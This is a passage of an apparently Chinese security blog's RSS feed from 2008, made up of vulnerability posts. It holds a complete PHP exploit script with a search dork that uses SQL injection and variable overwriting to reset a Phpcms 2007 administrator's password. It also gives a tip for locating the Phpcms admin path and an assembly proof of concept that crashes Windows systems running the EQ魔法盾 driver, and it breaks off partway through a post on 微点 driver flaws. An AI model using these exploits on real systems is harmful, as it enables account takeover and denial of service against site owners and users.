$mod_id=$id&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//这里可以select出需要的任何数据，但是下面并没有比较好的输出数据的地方&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#125;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$res = $db-&amp;gt;get_one($sql);&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;@extract($res);&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//注意这里，这里对select出数据的执行了extract,如果可以控制查询的数据，就可以覆盖任意变量了:)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;......&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ($credit_on == 1 &amp;amp;&amp;amp; $con &amp;amp;&amp;amp; $con != 5 &amp;amp;&amp;amp; $con != 0)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$sql = &amp;quot;SELECT `credit` FROM &amp;quot; . TABLE_MEMBER . &amp;quot; WHERE `username`=&amp;#039;$editor&amp;#039;&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$res_member = $db-&amp;gt;get_one($sql);&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ($res_member)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ($con == 3)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$credit = $res_member&amp;#91;&amp;#039;credit&amp;#039;&amp;#93; - $credit_num;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#125;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if ($con == 1 &amp;#124;&amp;#124; $con == 2)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$credit = $res_member&amp;#91;&amp;#039;credit&amp;#039;&amp;#93; + $credit_num;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#125;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$db-&amp;gt;query(&amp;quot;UPDATE &amp;quot; . TABLE_MEMBER . &amp;quot; SET `credit`=&amp;#039;$credit&amp;#039; WHERE `username`=&amp;#039;$editor&amp;#039;&amp;quot;);&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;/*&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;* 这里就是最终要利用的地方了&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;* $credit_on是在digg_setting.php里定义的，但可以利用前面的extract覆盖掉&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;* $editor,$credit也利用前面的extract的来覆盖，因为这样是从数据库中查询出的数据，是不受GPC影响的:)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;*/&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#125;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#125;&lt;/div&gt;&lt;br/&gt;前面就是具体的利用思路，再来说说这个sql语句的构造，因为我们需要$credit_on,$editor,$credit这三个变量，所以要有相应的字段，完整的sql语句如下：&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;SELECT * FROM &amp;#91;tablepre&amp;#93;&amp;#91;table_name&amp;#93;,(SELECT 1 AS credit_on,&amp;#91;1&amp;#039;,password=&amp;#039;&amp;#91;password&amp;#93;&amp;#039; WHERE username=&amp;#039;&amp;#91;admin&amp;#93;&amp;#039;#&amp;#93; AS credit,&amp;#91;&amp;#039; UNION SELECT 1#&amp;#93; AS editor) AS &amp;#91;table_name&amp;#93; LIMIT 1# WHERE &amp;#91;mod_id&amp;#93;=&amp;#91;id&amp;#93;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;测试代码&lt;/strong&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;#!/usr/bin/php&lt;br/&gt;&amp;lt;?php&lt;br/&gt;&lt;br/&gt;print_r(&amp;#039;&lt;br/&gt;+---------------------------------------------------------------------------+&lt;br/&gt;Phpcms 2007 SP6 reset admin password exploit&lt;br/&gt;by puret_t&lt;br/&gt;mail: puretot at gmail dot com&lt;br/&gt;team: &lt;a href=&quot;http://www.wolvez.org&quot; target=&quot;_blank&quot;&gt;http://www.wolvez.org&lt;/a&gt;&lt;br/&gt;dork: &amp;quot;Powered by Phpcms 2007&amp;quot;&lt;br/&gt;+---------------------------------------------------------------------------+&lt;br/&gt;&amp;#039;);&lt;br/&gt;/**&lt;br/&gt;* works regardless of php.ini settings&lt;br/&gt;*/&lt;br/&gt;if ($argc &amp;lt; 4) &amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print_r(&amp;#039;&lt;br/&gt;+---------------------------------------------------------------------------+&lt;br/&gt;Usage: php &amp;#039;.$argv&amp;#91;0&amp;#93;.&amp;#039; host path user&lt;br/&gt;host:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;target server (ip/hostname)&lt;br/&gt;path:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;path to phpcms&lt;br/&gt;user:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;admin login name&lt;br/&gt;Example:&lt;br/&gt;php &amp;#039;.$argv&amp;#91;0&amp;#93;.&amp;#039; localhost /phpcms/ admin&lt;br/&gt;+---------------------------------------------------------------------------+&lt;br/&gt;&amp;#039;);&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;exit;&lt;br/&gt;&amp;#125;&lt;br/&gt;&lt;br/&gt;error_reporting(7);&lt;br/&gt;ini_set(&amp;#039;max_execution_time&amp;#039;, 0);&lt;br/&gt;&lt;br/&gt;$host = $argv&amp;#91;1&amp;#93;;&lt;br/&gt;$path = $argv&amp;#91;2&amp;#93;;&lt;br/&gt;$user = $argv&amp;#91;3&amp;#93;;&lt;br/&gt;&lt;br/&gt;$url = &amp;#039;&lt;a href=&quot;http://&amp;#039;.$host.$path.&amp;#039;member/member.php?username=&amp;#039;.$user;&quot; target=&quot;_blank&quot;&gt;http://&amp;#039;.$host.$path.&amp;#039;member/member.php?username=&amp;#039;.$user;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;send();&lt;br/&gt;&lt;br/&gt;if (strpos(file_get_contents($url), &amp;#039;puret_t&amp;#039;) !== false)&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;exit(&amp;quot;Expoilt Success!&amp;#92;nAdmin New Password:&amp;#92;t123456&amp;#92;n&amp;quot;);&lt;br/&gt;else&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;exit(&amp;quot;Exploit Failed!&amp;#92;n&amp;quot;);&lt;br/&gt;&lt;br/&gt;function send()&lt;br/&gt;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;global $host, $path, $user;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$cmd = &amp;#039;digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x&amp;#039;.bin2hex(&amp;#039;1&amp;#92;&amp;#039;,password=&amp;#92;&amp;#039;e10adc3949ba59abbe56e057f20f883e&amp;#92;&amp;#039;,email=&amp;#92;&amp;#039;puret_t&amp;#92;&amp;#039;,showemail=1 WHERE username=&amp;#92;&amp;#039;&amp;#039;.$user.&amp;#039;&amp;#92;&amp;#039;#&amp;#039;).&amp;#039;/**/AS/**/credit,0x&amp;#039;.bin2hex(&amp;#039;&amp;#92;&amp;#039; UNION SELECT 1#&amp;#039;).&amp;#039;/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&amp;amp;id=1&amp;amp;con=6&amp;#039;;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message = &amp;quot;POST &amp;quot;.$path.&amp;quot;digg/digg_add.php&amp;nbsp;&amp;nbsp;HTTP/1.1&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;Accept: */*&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;Accept-Language: zh-cn&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;Content-Type: application/x-www-form-urlencoded&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;CLIENT-IP: &amp;quot;.time().&amp;quot;&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;Host: $host&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;Content-Length: &amp;quot;.strlen($cmd).&amp;quot;&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= &amp;quot;Connection: Close&amp;#92;r&amp;#92;n&amp;#92;r&amp;#92;n&amp;quot;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$message .= $cmd;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$fp = fsockopen($host, 80);&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;fputs($fp, $message);&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$resp = &amp;#039;&amp;#039;;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;while ($fp &amp;amp;&amp;amp; !feof($fp))&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$resp .= fread($fp, 1024);&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return $resp;&lt;br/&gt;&amp;#125;&lt;br/&gt;&lt;br/&gt;?&amp;gt;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/phpcms2007/&quot; rel=&quot;tag&quot;&gt;phpcms2007&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%259B%25B4%25E6%2594%25B9%25E7%25AE%25A1%25E7%2590%2586%25E5%2591%2598%25E5%25AF%2586%25E7%25A0%2581%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;更改管理员密码漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7e9d6dfdc9fda2f6c4e251f3017384ff&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7e9d6dfdc9fda2f6c4e251f3017384ff&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=2e23d1796e99bedada02855c562b1509&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=2e23d1796e99bedada02855c562b1509&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=b02194ffa406c0d448bb3fb7ccd22ede&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=b02194ffa406c0d448bb3fb7ccd22ede&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=5cf1cb489cad87952b22794bead1c2d4&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=5cf1cb489cad87952b22794bead1c2d4&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=29fdbeb4aa0dbbef59454cbcef3a37d5&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=29fdbeb4aa0dbbef59454cbcef3a37d5&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=05c97990d05996f53e94a11e0904b44a&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=05c97990d05996f53e94a11e0904b44a&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=fdc10a5c76aab7a9ec92b3a1afe34eb2&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=fdc10a5c76aab7a9ec92b3a1afe34eb2&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:42:02 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/Phpcms2007-admin-pass/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/Phpcms2007-admin-pass/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473229/5165305</fs:itemid></item><item><title>PHPCMS 2007获取后台地址漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473230/5165305/1/item.html</link><description>http://www.url.com/fckeditor/fckconfig.js &lt;br/&gt;保存本地打开 搜索.php 就可以看到了&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/phpcms/&quot; rel=&quot;tag&quot;&gt;phpcms&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E8%258E%25B7%25E5%258F%2596%25E5%2590%258E%25E5%258F%25B0%25E5%259C%25B0%25E5%259D%2580%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;获取后台地址漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=38fb044a98d53eb2972301785b17a904&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=38fb044a98d53eb2972301785b17a904&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=a84afae9c87328a6e595bc9a42b4f090&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=a84afae9c87328a6e595bc9a42b4f090&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=b22879b6dcd817b1e035e2e5f96e5a49&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=b22879b6dcd817b1e035e2e5f96e5a49&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=8f9deba421412fe074b593b94d53ba01&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=8f9deba421412fe074b593b94d53ba01&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=af054e29963fdaf8606f23c3975e449d&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=af054e29963fdaf8606f23c3975e449d&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=f7c7df0fb8b3569468814f2bb2ec8f3f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=f7c7df0fb8b3569468814f2bb2ec8f3f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=256c192506066035b2424cf8d6a5613d&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=256c192506066035b2424cf8d6a5613d&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>聚焦热点</category><pubDate>Thu, 02 Oct 2008 10:36:32 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/post/284/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/post/284/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473230/5165305</fs:itemid></item><item><title>EQ魔法盾 4.0增强版多处内核拒绝服务漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473231/5165305/1/item.html</link><description>涉及版本 EQ魔法盾 4.0 20080902及以下&lt;br/&gt;&lt;br/&gt;EQ魔法盾的驱动程序员对用户态参数检查有一定概念，可惜没有正确理解ProbeForRead的用法，导致几乎所有的SSDT HOOK函数都存在用户态检查不正确的问题,漏洞多达数十处。&lt;br/&gt;&lt;br/&gt;此漏洞可导致任意用户权限的程序可以在安装了EQ魔法盾的系统上引发蓝屏&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;出问题的组件：EQSysSecure.sys ,版本:2008.9.1.26 CheckSum = 0x0001EFD3 TimeStamp = 0x48BAC155&lt;br/&gt;&lt;br/&gt;EQ魔法盾的驱动中有这样一个函数 :偏移608d处 sub_16c8d&lt;br/&gt;&lt;br/&gt;该函数处于一个带Try..Except的结构中，使用ProbeForRead来检查参数&lt;br/&gt;&lt;br/&gt;检查完毕后即直接用户态参数，而实际上，如果传入用户态无效地址，ProbeForRead是不会产生任何反应的，因此读写用户态缓存的代码也必须置于结构化异常处理之中。&lt;br/&gt;&lt;br/&gt;这个问题存在于EQ的大部分HOOK函数中，有几十处之多，这里只举出一个例子:&lt;br/&gt;&lt;br/&gt;ZwCreateKey,下面是测试代码，运行此代码后安装了EQ魔法盾的系统上即会引发蓝屏重启：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwCreateKey&amp;quot;);&lt;br/&gt;&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 1&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0 &lt;br/&gt;&amp;nbsp;&amp;nbsp; call p&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;测试程序下载:&lt;a href=&quot;http://mj0011.ys168.com&quot; target=&quot;_blank&quot;&gt;http://mj0011.ys168.com&lt;/a&gt; ,漏洞演示下BSOD_EQ.rar&lt;br/&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/eq%25E9%25AD%2594%25E6%25B3%2595%25E7%259B%25BE/&quot; rel=&quot;tag&quot;&gt;eq魔法盾&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%2586%2585%25E6%25A0%25B8%25E6%258B%2592%25E7%25BB%259D%25E6%259C%258D%25E5%258A%25A1%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;内核拒绝服务漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=0605d18276a98a1e1f235f2e3438bf27&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=0605d18276a98a1e1f235f2e3438bf27&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=33757665a5ed22a0fb48eb9b8f1977d0&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=33757665a5ed22a0fb48eb9b8f1977d0&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=ab33fe36d1a97b4d8c75351cc90b1bc0&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=ab33fe36d1a97b4d8c75351cc90b1bc0&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=cb2466782f3b558cb8781c9a1ebf889e&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=cb2466782f3b558cb8781c9a1ebf889e&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=4b331da5e7495a4280b2488ea97021ee&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=4b331da5e7495a4280b2488ea97021ee&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=adfcb299bf4584a362d5e763a74927a8&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=adfcb299bf4584a362d5e763a74927a8&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7fd063a324e63f9eae4df40db1b59411&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7fd063a324e63f9eae4df40db1b59411&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:35:19 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/EQsecure/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/EQsecure/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473231/5165305</fs:itemid></item><item><title>微点主动防御多个拒绝服务漏洞及内核漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473232/5165305/1/item.html</link><description>涉及版本: 微点 version20080924及以下&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;(1),驱动对ZwOpenEvent的HOOK存在拒绝服务安全漏洞，任何权限用户可以使安装了微点的系统蓝屏&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;问题在于微点的Hook驱动mp110013.sys对用户态调用ZwOpenEvent传入参数检查不充分导致的&lt;br/&gt;&lt;br/&gt;mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 